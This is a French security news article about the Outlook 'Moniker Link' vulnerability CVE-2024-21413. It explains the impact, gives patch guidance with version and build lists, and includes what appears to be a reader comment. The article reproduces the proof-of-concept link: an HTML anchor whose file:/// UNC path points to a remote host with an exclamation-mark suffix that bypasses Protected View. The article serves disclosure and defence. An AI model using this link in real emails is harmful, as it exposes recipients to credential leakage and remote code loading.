Patchez Outlook : cette faille critique est particulièrement simple à exploiter (CVE-2024-21413)
Une nouvelle faille de sécurité présente dans Outlook mérite une attention particulière : déjà parce qu'elle est critique, mais aussi et surtout, parce qu'elle peut être exploitée de façon très simple par un attaquant non authentifié. Il va falloir s'en protéger rapidement. Faisons le point.
À l'occasion du Patch Tuesday de Février 2024, Microsoft a corrigé un ensemble de vulnérabilités dans ses produits. Parmi elle, il y a une faille de sécurité critique qui affecte directement le client de messagerie Outlook et ses utilisateurs : CVE-2024-21413. En lisant la suite de cet article, vous comprendrez qu'elle sera surement utilisée dans le cadre de campagnes de phishing...
Tout d'abord, sachez que sur une machine vulnérable, c'est-à-dire avec un Outlook qui ne bénéficie pas du nouveau correctif de sécurité, cette faille de sécurité peut-être exploitée à l'aide d'un e-mail qui contiendrait un lien malveillant. Il suffit que l'utilisateur ouvre l'e-mail ou qu'il l'affiche via le panneau de prévisualisation pour que l'attaque se déclenche. Microsoft le précise de façon explicite dans son bulletin de sécurité : "Le volet de prévisualisation est-il un vecteur d'attaque pour cette vulnérabilité ? Oui, le volet de prévisualisation est un vecteur d'attaque." - Le tout sans aucune interaction de la part de l'utilisateur, si ce n'est qu'il doit cliquer sur l'e-mail.
De plus, cette vulnérabilité permet d'outrepasser l'ouverture en mode protégé ! En principe, cette fonctionnalité de sécurité est là pour "bloquer" le contenu malveillant ou externe, grâce à l'ouverture du fichier en lecture seule. Dans le cas présent, le fichier malveillant s'ouvrira en mode édition, ce qui signifie que tous ses composants internes seront chargés.
Pour finir, cette vulnérabilité offre la possibilité à l'attaquant d'élever ses privilèges. Microsoft précise : "Un attaquant qui parviendrait à exploiter cette vulnérabilité pourrait obtenir des privilèges élevés, notamment des fonctionnalités de lecture, d'écriture et de suppression."
Une vulnérabilité baptisée Moniker Link
Cette faille de sécurité a été découverte par Haifei Li, chercheur en sécurité chez Check Point. Un rapport complet a été mis en ligne sur le site de Check Point pour apporter des précisions techniques sur cette vulnérabilité baptisée Moniker Link.
La vulnérabilité Moniker Link est présente dans l'utilisation du protocole "file://" qui permet de faire appel à des ressources distantes, notamment des fichiers. Haifei Li explique pour exploiter cette vulnérabilité, le lien malveillant doit être conçu de cette façon :
<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>
En fait, il suffit de spécifier le chemin vers le fichier à charger, ici "\\10.10.111.111\test\test.rtf", d'indiquer un point d'exclamation, puis une chaine de caractères alératoires, comme ici "something". Le fait d'utiliser cette syntaxe va permettre de charger le fichier distant sans qu'Outlook n'émette le moindre avertissement. Le point d'exclamation fait toute la différence par rapport à l'écriture habituelle d'un lien.
Le rapport précise : "Un tel lien contournera la restriction de sécurité existante d'Outlook évoquée précédemment, et Outlook continuera d'accéder à la ressource distante "\10.10.111.111\test\test.rtf" lorsque l'utilisateur cliquera sur le lien."
Comment se protéger ?
Après la lecture de la première partie de cet article, je pense que vous avez envie de vous protéger de cette vulnérabilité plutôt inquiétante. Tout d'abord, voici la liste des versions de Microsoft Office vulnérables :
- Microsoft 365 Apps for Enterprise
- Microsoft Office 2021
- Microsoft Office 2019
- Microsoft Office 2016
À chaque fois, les éditions 32 bits et 64 bits sont affectées. D'ailleurs, Microsoft a également mis en ligne des correctifs de sécurité pour Office 2016, preuve qu'il y a un risque important pour les utilisateurs et les organisations (voir cette page).
Pour vous protéger, vous devez utiliser l'une de ces versions de Microsoft Office :
- Office 2021 : Version 2401 (Build 17231.20236)
- Office LTSC 2021 : Version 2108 (Build 14332.20637)
- Office 2019 : Version 2401 (Build 17231.20236)
- Office 2019 (Volume Licensed) : Version 1808 (Build 10407.20032)
- Office 2016 : Version 2401 (Build 17231.20236)
Pour Microsoft 365 Apps, voici la liste selon les différents canaux :
- Current Channel : Version 2401 (Build 17231.20236)
- Monthly Enterprise Channel : Version 2312 (Build 17126.20190)
- Monthly Enterprise Channel : Version 2311 (Build 17029.20178)
- Semi-Annual Enterprise Channel (Preview) : Version 2308 (Build 16731.20550)
- Semi-Annual Enterprise Channel : Version 2308 (Build 16731.20550)
- Semi-Annual Enterprise Channel : Version 2302 (Build 16130.20916)
- Semi-Annual Enterprise Channel : Version 2208 (Build 15601.20870)
Ces informations sont disponibles sur cette page du site Microsoft.
Il faut un peu nuancer, pour l’instant il faut quand même un clic. Mais ça peut arriver vite. Et surtout il faut que le trafic 445 soit ouvert vers l’extérieur ce qui ne devrait pas l’être dans une entreprise qui respect un tant soit peu la sécurité. Elle va être diffusée dans un premier temps vers les grosses entreprises et cible de choix.